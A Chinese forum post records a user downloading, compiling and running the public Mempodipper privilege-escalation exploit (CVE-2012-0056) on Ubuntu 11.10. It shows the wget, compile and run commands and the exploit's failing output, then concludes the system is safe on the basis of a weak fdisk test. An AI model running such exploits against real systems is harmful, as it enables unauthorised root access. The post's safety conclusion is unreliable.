刚才看到linux系统爆出了一个提权漏洞，那ubuntu11.10实验了下

[mobilefzb]

实验了几次，在客人账户下，程序运行到一半就卡死了。应该来说在这里还算是安全的。
guest-R0TDz7@mobilefzb-MS-7680:~$ wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
--2012-02-01 20:50:26-- http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
正在解析主机 git.zx2c4.com... 173.236.178.65, 2607:f298:2:122::2e0:9c2
正在连接 git.zx2c4.com|173.236.178.65|:80... 已连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度： 7093 (6.9K) [text/plain]
正在保存至: “mempodipper.c”

100%[======================================>] 7,093 13.9K/s 用时 0.5s

2012-02-01 20:50:28 (13.9 KB/s) - 已保存 “mempodipper.c” [7093/7093])

guest-R0TDz7@mobilefzb-MS-7680:~$ cc mempodipper.c
guest-R0TDz7@mobilefzb-MS-7680:~$ ./a.out
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x401ce8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3518/mem in child.
[-] open: Permission denied

[mobilefzb]

在管理员账户运行了一下，顺利通过了，但是运行一些还是需要管理员权限的命令还是不行的
比如说fdisk -l一般来说需要管理员才能查看到硬盘，所以要加sudo fdisk -l并输入密码
但是运行上面的程序后运行这个fdisk -l依然还是不能显示任何磁盘信息，所以应该来说ubuntu11.10还是安全的。